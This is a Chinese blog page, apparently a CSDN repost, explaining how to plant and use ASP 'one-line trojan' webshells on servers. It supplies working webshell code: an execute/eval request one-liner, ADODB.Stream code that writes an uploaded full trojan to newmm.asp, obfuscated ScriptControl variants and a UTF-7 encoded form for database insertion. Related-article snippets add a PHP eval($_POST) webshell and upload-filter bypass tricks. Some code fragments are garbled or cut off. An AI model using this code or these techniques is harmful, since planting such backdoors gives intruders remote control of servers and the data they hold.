aspx 调用php数据,再谈一句话木马的原理及利用(asp,aspx,php,jsp) -电脑资料

最新推荐文章于 2024-08-06 22:50:12 发布
最新推荐文章于 2024-08-06 22:50:12 发布
阅读量340 收藏
点赞数
文章标签: aspx 调用php数据
本文详细介绍了ASP环境下的一句话木马的工作原理,包括其适用环境、执行流程和利用方式。通过构造特定的ASP代码,可以实现远程控制和文件写入,形成后门。同时,针对可能出现的服务器错误,提出了使用'eval'替代'execute'来避免错误的方法。此外,还列举了一些常见的一句话木马变体和应对策略。
摘要由CSDN通过智能技术生成

一句话木马的适用环境:

1.服务器的来宾账户有写入权限

2.已知数据库地址且数据库格式为asa或asp

3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可

一句话木马的工作原理:

"一句话木马"服务端(本地的html提交文件)

就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为    其中value可以自己修改

"一句话木马"客户端(远程服务器上 入一句话的asp文件)

用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件

现在先假设在远程主机的TEXT.ASP(客户端)中已经有了这个语句.)在ASP里意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)

set lP=server.createObject("Adodb.Stream")//建立流对象

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "newmm.asp" //转向newmm.asp

添入生成木马的内容

表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

set lP=server.createObject("Adodb.Stream")//建立流对象

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "newmm.asp" //转向newmm.asp

这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.

至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中,再谈一句话木马的原理及利用(asp,aspx,php,jsp)》(https://www.unjs.com)。即newmm.asp为我们的shell地址。

关于服务器错误:

经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:

Script. error detected at line 1.

Source line: execute request("nettoo")

Description: 类型不匹配: 'execute'

这个如何解决呢?

想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!

用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。

常见asp一句话木马的变体:

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.AddObject "session", session

ms.AddObject "server", server

ms.AddObject "application", application

ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

9月30日

数据库里插入

┼攠数畣整爠焕敌瑳∨∣┩忾

utf-7的马

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.AddObject "session", session

[1] [2] [3]  下一页

weixin_39732506
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话木马拿Shell与菜刀原理
悦分享
07-12 1515
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX
网络——菜市场
08-07 1799
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析
经典的 Aspx一句话木马使用
tuo9999的专栏
07-12 1718
1. 相当于 ASP 一句话木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit
ASP.NET - 工作原理
weixin_30411997的博客
08-31 114
1. ASP.NET页面的的一般处理过程: 客户请求WEB页面 WEB服务寻找指令文件(.ASPX) ASP.NET代码被发送给CLR进行编译 HTML流返回给浏览器和指令 浏览器处理HTML并显示页面 2.ASP.NET详细处理过程:(请求的处理过程是基于管道模型的) 3. ISAPI筛选器 IIS默认不会处理动态页面,只能处理htm...
WebShell及一句话木马
最新发布
qq_67812668的博客
08-06 879
1.一句话木马原理一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵操作。客户端则用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件。 2.通常WebShell客户端怎么绕过WAF1).绕过前台脚本检测扩展名上传Webshell当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。
《professional asp.net 2.0》读书笔记--连载2
weixin_34007291的博客
10-26 123
1          User Controls, Server Controls, Modules and Handlers [2006-10-26] 1.1         通过《深入了解asp.net架构》来学习 本视频主要包括以下几个方面的内容: l         Asp.net请求的处理过程; l         httpModule; l         HttpHan...
ASP的工作原理
luckcomputer
01-14 1305
    当在Web站点中融入ASP功能后,将发生以下事情:   1、用户向浏览器地址栏输入网址,默认页面的扩展名是.asp。   2、浏览器向服务器发出请求。   3、服务器引擎开始运行ASP程序。  4、ASP文件按照从上到下的顺序开始处理,执行脚本命令,执行HTML页面内容。   5、页面信息发送到浏览器。
aspx页面里内嵌php代码吗,html编辑器怎样嵌入到aspx页面中
weixin_39870155的博客
04-02 124
HTML在线编辑器有两种基本调用方法一、使用object调用1、怎么在web页中嵌入html编辑器: 我们在需要嵌入得位置加入以下html代码:其中object标签里面得data后面接得数据就是我们所要调用得在线编辑器页得路径,id就是我们调用object得id,后面取编辑器中得数据时就要用到这个id。Width和height就是编辑器得高度和宽度了。2、怎么取得html编辑器中的数据:所有需要提...
php一句话工作原理,一句话木马的工作原理
weixin_31847389的博客
03-24 2144
一句话木马的工作原理一句话木马分析服务端与客户端。'一句话木马'服务端(是用于本地的html提交脚本木马文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改'一句话木马'客户端(远程服务器上被插入一句话asp可执行文件)用来向服务端提交...
php一句话木马调用cmd命令,一句话木马(webshell)是如何执行命令的
weixin_31748605的博客
03-09 2897
在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论aspphpjspaspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言,或者初级的安全爱好者,或者脚本小子而言,看到的第一...
初识文件上传(主PHP以及upload-labs前十解)
weixin_51334923的博客
10-28 678
在网站的运营过程中,不可避免地要对网站的某些页面或者内容进行更新,这时便需要使用到网站的文件上传的功能。如果不对被上传的文件进行限制或者限制被绕过,该功能便有可能会被利用于上传可执行文件、脚本到服务器上,进而进一步导致服务器沦陷。 一些经典的位置都可以让你把文件给上传到服务器上,但是通常有一些检测流程,建议从流程开始出发,针对性的面对检测上传文件。 1.基础知识: PHP Server .php .php3 .php4 .php5 .php7 ​ # Less known PHP exten
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
ASP-工作原理
Adrian 博客
05-21 3375
http://baike.baidu.com/view/2616.htm ASP网页特点   ASP是一种服务器端脚本编写环境,可以用来创建和运行动态网页或Web应用程序。ASP网页可以包含HTML标记、普通文本、脚本命令以及COM组件等。利用ASP可以向网页中添加交互式内容(如在线表单),也可以创建使用HTML网页作为用户界面的web应用程序。与HTML相比,ASP网页具有以下特点:
ASP.NET的工作原理
q470476351的专栏
01-06 896
ASP.NET的工作原理 在多数场合下,可以将ASP.NET页面简单地看成一般的HTML页面,页面包含标记有特殊处理方式的一些代码段。当安装.NET时,本地的IIS Web服务器自动配置成查找扩展名为.aspx的文件,且用ASP.NET模块(名为aspnet_isapi.dll的文件)处理这些文件。从技术上讲,ASP.NET模块分析ASPX文件的内容,并将文件内容分解成单独的命令以建立
PHP一句话木马
Code-5的博客
04-17 2198
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
php一句话木马
X__WY__X的博客
09-18 2713
php一句话木马 1.介绍 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 2.原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例:<?php
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
过狗一句话汇总(包含asp+php+aspx+jsp)
01-26
过狗一句话汇总,是一个用于表示利用各种网站漏洞在网站上发布恶意代码的黑客行为。这个词通常与ASPPHPASPX、JSP等网站开发语言相关联。黑客们会在网站上植入恶意代码,比如恶意脚本、木马病毒等,以获取用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值